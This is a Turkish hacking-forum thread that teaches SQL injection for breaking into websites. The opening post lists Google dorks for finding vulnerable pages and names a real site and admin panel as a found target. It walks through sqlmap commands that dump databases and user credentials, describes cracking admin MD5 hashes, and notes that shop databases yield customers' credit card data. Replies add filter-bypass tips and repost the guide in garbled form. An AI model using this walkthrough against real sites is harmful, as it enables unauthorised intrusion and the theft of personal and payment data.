Sql Açığı Nedir Nasıl Kullanılır ?

H A

Katılımcı Üye
10 Tem 2019
850
27
KIBRIS
Merhaba arkadaşlar kafanıza takılan soruyu bugün size yanıtlayacağım THT Yardım Merkezi'nde bazı arkadaşlarımız sql ile site nasıl hacklerim gibisinden konu açıyordu bugün bende sizlere en ince ayrıntısına kadar sql'i anlatacağım başlayalım.

Sql Nedir ?
(Wikipedia)SQL, verileri yönetmek ve tasarlamak için kullanılan bir veritabanı yönetim sistemidir. SQL, kendisi bir programlama dili olmamasına rağmen birçok kişi tarafından programlama dili olarak bilinir. SQL herhangi bir veri tabanı ortamında kullanılan bir alt dildir. SQL ile yalnızca veri tabanı üzerinde işlem yapılabilir.

Sitelerde Neden Sql Açığı Bulunur(Olur) ?
Bazı SQL dilinde yazılmış sitelerde hatalar yani açıklar oluşabilir.Bunun nedeni Web Master'lerın yani siteyi yazanların Kod'da hata yapmış olmalarıdır...

SQL Açıklı Siteleri Hacklemenin Mantığı Nedir ?
Arkadaşlar SQL açıklı sitelerde bütün bilgiler "DATABASE"ye saklanır...
Bizler bu açıklardan faydalanarak "
DATABASE"ye girebilir ve bilgilerini alabiliriz.Bu bi alışveriş sitesi olsun diyelim.Databaseyi çektiğimiz zaman içindeki müşterilerinde bilgilerini almış oluruz ve onların cc yani Credi Card bilgilerine de ulaşmış oluruz.DATABASE demek herşey demek sadece admin password olarak algılamayın.Araştırın iyice inceleyin DATABASE'leri.

Sql Açıklı Site Nasıl Bulunur ?
Sql açıklı siteleri bulmak için bize dorklar yardımcı olur.Şunu belirtmek isterim açıkları sadece dorklar ile bulmazsınız herhangi bi siteye girdiniz mesela (Sitehaber.com/news.php?id=1) böyle bi sayfaya giriş yaptınız o sayfadaki url'ye " ' " Uygularsanız hata vericektir (Sitehaber.com/news.php?id=1') gibi ve birçok program ile hedef sitelerdeki sql açıklarını bulabilirsiniz.
Ben sizlere kısa ve bilindik dorkları vereceğim dork'un mantığı şudur herhangi bi dork bulabilirsiniz mesela italyan sitesine girdiniz orda
" Sayfa " demek " Pagina " Arama yaparken siz page.php?id= kullanıyorsunuz sadece italyaya ait siteleri hacklemek istiyorsanız italyanca kelimelere çevireceksiniz dorkları neyse fazla uzatmadan şöyle dorkları vereyim.

Dorklar ?

news.php?id=
index.php=id=
news_details.php?id=

Dorkları nasıl kullanırız ? ( Resimli Anlatım En Sonda )
-->Evet arkadaşlar bu kısımda yapacağımız şey " Google Yahoo Bing Yandex " gibi arama motorlarına giriyoruz.
-->Herhangi bi dorkumuzu yapıştırıyoruz.(news_details.php?id=)
-->Sitemizi arıyoruz sql açıklı olan ben buldum ( News and Activities | News) Sonuna " ' " getirdiğimiz zaman hata vericektir bana verdiği hata ( ( ! ) Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in C:\wamp\www\en\news_detail.php on line 47 )
-->Daha sonra havij veya sqlmap'ı açıyoruz.Sitemizi taratmaya başlıyoruz.
-->Daha sonra çıkan db leri çekiyoruz.
-->Username Password dblerini çekiyoruz karşımıza admin password geliyor.(Password'lar arada md5 li çıkabiliyor havijin kendi kırma md5'i var fakat tavsiyem online site https://hashkiller.co.uk/Cracker/MD5 )
-->Şimdi sitemizin admin panelini buluyoruz.(http://www.asiawealth.co.th/admin/)
-->Admin & Password'u yazarak giriş yapıyoruz artık paneldeyiz.

Resimli (Görüntülü) Anlatım

4plZGQ.png

JV27OB.png

OrM3y5.png

zG42JD.png

GZzpy7.png

yG4Aza.png

6DnlyW.png

Sqlmap Windows İçin

Sqlmap pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır.
Sqlmap, veritabanı açıklarını tespit etmek ve kullanmak için kullanılan açık kodlu bir yazılımdır ve kötü niyetli kodları bunlara eklemek için seçenekler sunar. Terminalde kullanıcı arayüzü sağlayan SQL enjeksiyon hatalarını tespit etme ve kullanma işlemini otomatikleştiren bir penetrasyon test aracıdır.

-->İlk olarak Python'u indiriyoruz. (https://www.python.org/downloads/release/python-374/)
-->Daha sonra SQLMAP'ı indiriyoruz. (sqlmap: automatic SQL injection and database takeover tool) hemen sağ tarafta .zip olarak.
-->Kurulumu gerçekleştiriyoruz.(Next diyip geçerek)
-->Sqlmap'da ise ".zip" den çıkan dosyayı Python'nun kurulu olduğu yere atıyorsunuz.Yani C:\Python27 buraya.
-->Python klasörünün içine attığınız dosyanın ismini değiştiriceksiniz (Sqlmap'ın içinden çıkan zip'teki dosya) sqlmapproject-sqlmap-48ac210 dosyasını SQLMap yapacaksınız.
-->Masaüstü > Sağ tık > Yeni > Kısayol diyorsunuz.Ögenin konumuna CMD yazıp ileri diyorsunuz. Kısayol için ad kısmına SQLMap yazıp son diyoruz
-->Kısayol oluşturduktan sonra sağ tıklayıp kısayola özellikler diyin ve başlama yerine Python dosyasının içine attığınız sqlmap dosyasının link ini yazın yani C:\Python27\SQLMap.

Çalıştırmak için yapacağınız şey.
Cd..
Cd desktop
cd sqlmap

gPo4rR.png

PrymZ9.png

Z5dAXa.png

Veritabani Çekmek için :

sqlmap.py -uhttp://www.hedefsite.com/sqlacık=1 --dbs

Veritabanındaki Tabloları Çekmek İçin :

sqlmap.py -uhttp://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı --tables

Kolanları Çekmek İçin :

sqlmap.py -uhttp://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı -T Tablo_Adı --columns

Kullanici Bilgilerini Çekmek İçin

sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı --dump

Kali linux için sqlmap

Arkadşalar zaten kalilinux'da zaten sqlmap yüklü olarak geliyor şöyle gösteriyim.
Terminali açarak sadece sqlmap yazıyoruz.Windows için geçerli olan komutlar linux için de geçerlidir.

gPo4v5.png

ÇOK ÖNEMLİ BİR NOT ! Admin panelini bulduğunuz sitelere bypass denemeden geçmeyin illa db yi çekmenize gerek yoktur.

Son düzenleme:

InSpy

Katılımcı Üye
21 Mar 2019
992
2
Güzel emeğine sağlık. Sqlmap ile bypass işlemlerinde yaygın olarak kullanılan randomcase.py isimli scripti kullanabilirsiniz. Diğer bypass scriptlerini görmek için: /usr/share/sqlmap/tamper/ konumuna göz atabilirsiniz.

H A

Katılımcı Üye
10 Tem 2019
850
27
KIBRIS
Güzel emeğine sağlık. Sqlmap ile bypass işlemlerinde yaygın olarak kullanılan randomcase.py isimli scripti kullanabilirsiniz. Diğer bypass scriptlerini görmek için: /usr/share/sqlmap/tamper/ konumuna göz atabilirsiniz.

Randomcaseyi tavsiye etmiyorum ya gene bilmiyorum siz bilirsiniz.

selman123_

Yeni üye
27 Kas 2021
17
2
Merhaba arkadaşlar kafanıza takılan soruyu bugün size yanıtlayacağım THT Yardım Merkezi'nde bazı arkadaşlarımız sql ile site nasıl hacklerim gibisinden konu açıyordu bugün bende sizlere en ince ayrıntısına kadar sql'i anlatacağım başlayalım.

Sql Nedir ?
(Wikipedia)SQL, verileri yönetmek ve tasarlamak için kullanılan bir veritabanı yönetim sistemidir. SQL, kendisi bir programlama dili olmamasına rağmen birçok kişi tarafından programlama dili olarak bilinir. SQL herhangi bir veri tabanı ortamında kullanılan bir alt dildir. SQL ile yalnızca veri tabanı üzerinde işlem yapılabilir.

Bazı SQL dilinde yazılmış sitelerde hatalar yani açıklar oluşabilir.Bunun nedeni Web Master'lerın yani siteyi yazanların Kod'da hata yapmış olmalarıdır...

Arkadaşlar SQL açıklı sitelerde bütün bilgiler "
DATABASE"ye saklanır...
DATABASE"ye girebilir ve bilgilerini alabiliriz.Bu bi alışveriş sitesi olsun diyelim.Databaseyi çektiğimiz zaman içindeki müşterilerinde bilgilerini almış oluruz ve onların cc yani Credi Card bilgilerine de ulaşmış oluruz.DATABASE demek herşey demek sadece admin password olarak algılamayın.Araştırın iyice inceleyin DATABASE'leri.

Sql açıklı siteleri bulmak için bize dorklar yardımcı olur.Şunu belirtmek isterim açıkları sadece dorklar ile bulmazsınız herhangi bi siteye girdiniz mesela (Sitehaber.com/news.php?id=1)
böyle bi sayfaya giriş yaptınız o sayfadaki url'ye " ' " Uygularsanız hata vericektir (Sitehaber.com/news.php?id=1') gibi ve birçok program ile hedef sitelerdeki sql açıklarını bulabilirsiniz.
Ben sizlere kısa ve bilindik dorkları vereceğim dork'un mantığı şudur herhangi bi dork bulabilirsiniz mesela italyan sitesine girdiniz orda
" Sayfa "
demek " Pagina " Arama yaparken siz page.php?id= kullanıyorsunuz sadece italyaya ait siteleri hacklemek istiyorsanız italyanca kelimelere çevireceksiniz dorkları neyse fazla uzatmadan şöyle dorkları vereyim.

Dorklar ?

news.php?id=
index.php=id=
news_details.php?id=

-->Evet arkadaşlar bu kısımda yapacağımız şey " Google Yahoo Bing Yandex " gibi arama motorlarına giriyoruz.
-->Sitemizi arıyoruz sql açıklı olan ben buldum ( News and Activities | News) Sonuna " ' " getirdiğimiz zaman hata vericektir bana verdiği hata ( ( ! ) Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in C:\wamp\www\en\news_detail.php on line 47 )
-->Username Password dblerini çekiyoruz karşımıza admin password geliyor.(Password'lar arada md5 li çıkabiliyor havijin kendi kırma md5'i var fakat tavsiyem online site https://hashkiller.co.uk/Cracker/MD5 )
-->Şimdi sitemizin admin panelini buluyoruz.(http://www.asiawealth.co.th/admin/)

4plZGQ.png

JV27OB.png

OrM3y5.png

zG42JD.png

GZzpy7.png

yG4Aza.png

6DnlyW.png

Sqlmap Windows İçin

Sqlmap
pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır.
Sqlmap, veritabanı açıklarını tespit etmek ve kullanmak için kullanılan açık kodlu bir yazılımdır ve kötü niyetli kodları bunlara eklemek için seçenekler sunar. Terminalde kullanıcı arayüzü sağlayan SQL enjeksiyon hatalarını tespit etme ve kullanma işlemini otomatikleştiren bir penetrasyon test aracıdır.

-->İlk olarak Python'u indiriyoruz. (Python Release Python 3.7.4)
-->Daha sonra SQLMAP'ı indiriyoruz. (sqlmap: automatic SQL injection and database takeover tool) hemen sağ tarafta .zip olarak.
-->Sqlmap'da ise ".zip" den çıkan dosyayı Python'nun kurulu olduğu yere atıyorsunuz.Yani C:\Python27 buraya.
-->Python klasörünün içine attığınız dosyanın ismini değiştiriceksiniz (Sqlmap'ın içinden çıkan zip'teki dosya) sqlmapproject-sqlmap-48ac210 dosyasını SQLMap yapacaksınız.
-->Masaüstü > Sağ tık > Yeni > Kısayol diyorsunuz.Ögenin konumuna CMD yazıp ileri diyorsunuz. Kısayol için ad kısmına SQLMap yazıp son diyoruz
-->Kısayol oluşturduktan sonra sağ tıklayıp kısayola özellikler diyin ve başlama yerine Python dosyasının içine attığınız sqlmap dosyasının link ini yazın yani C:\Python27\SQLMap.

Cd..
Cd desktop
cd sqlmap

gPo4rR.png

PrymZ9.png

Z5dAXa.png

Veritabani Çekmek için :

sqlmap.py -uKişisel Blog Sayfası - Hedef Blog --dbs

sqlmap.py -uKişisel Blog Sayfası - Hedef Blog -D Veritabanı_Adı --tables

Kolanları Çekmek İçin :

sqlmap.py -uKişisel Blog Sayfası - Hedef Blog -D Veritabanı_Adı -T Tablo_Adı --columns

sqlmap.py -u Kişisel Blog Sayfası - Hedef Blog -D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı --dump

Kali linux için sqlmap

Arkadşalar zaten kalilinux'da zaten sqlmap yüklü olarak geliyor şöyle gösteriyim.
Terminali açarak sadece sqlmap yazıyoruz.Windows için geçerli olan komutlar linux için de geçerlidir.

gPo4v5.png

ÇOK ÖNEMLİ BİR NOT ! Admin panelini bulduğunuz sitelere bypass denemeden geçmeyin illa db yi çekmenize gerek yoktur.
ben tam anlamadım
uniscan ile tarattım buldu bunu yaptıktan sonra ne yapacaz

11 Tem 2021
168
51

Sql Nedir ?

Arkadaşlar SQL açıklı sitelerde bütün bilgiler "
DATABASE"ye saklanır...

Sql açıklı siteleri bulmak için bize dorklar yardımcı olur.Şunu belirtmek isterim açıkları sadece dorklar ile bulmazsınız herhangi bi siteye girdiniz mesela (Sitehaber.com/news.php?id=1)
böyle bi sayfaya giriş yaptınız o sayfadaki url'ye " ' " Uygularsanız hata vericektir (Sitehaber.com/news.php?id=1') gibi ve birçok program ile hedef sitelerdeki sql açıklarını bulabilirsiniz.
" Sayfa "
demek " Pagina " Arama yaparken siz page.php?id= kullanıyorsunuz sadece italyaya ait siteleri hacklemek istiyorsanız italyanca kelimelere çevireceksiniz dorkları neyse fazla uzatmadan şöyle dorkları vereyim.

Dorklar ?

news.php?id=
index.php=id=
news_details.php?id=

4plZGQ.png

JV27OB.png

OrM3y5.png

zG42JD.png

GZzpy7.png

yG4Aza.png

6DnlyW.png

Sqlmap Windows İçin

Sqlmap
pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır.

-->İlk olarak Python'u indiriyoruz. (Python Release Python 3.7.4)

Cd..
Cd desktop
cd sqlmap

gPo4rR.png

PrymZ9.png

Z5dAXa.png

Veritabani Çekmek için :

sqlmap.py -uKişisel Blog Sayfası - Hedef Blog --dbs

sqlmap.py -uKişisel Blog Sayfası - Hedef Blog -D Veritabanı_Adı --tables

Kolanları Çekmek İçin :

sqlmap.py -uKişisel Blog Sayfası - Hedef Blog -D Veritabanı_Adı -T Tablo_Adı --columns

sqlmap.py -u Kişisel Blog Sayfası - Hedef Blog -D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı --dump

Kali linux için sqlmap

gPo4v5.png

oldukca yararlı elınıze saglık

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.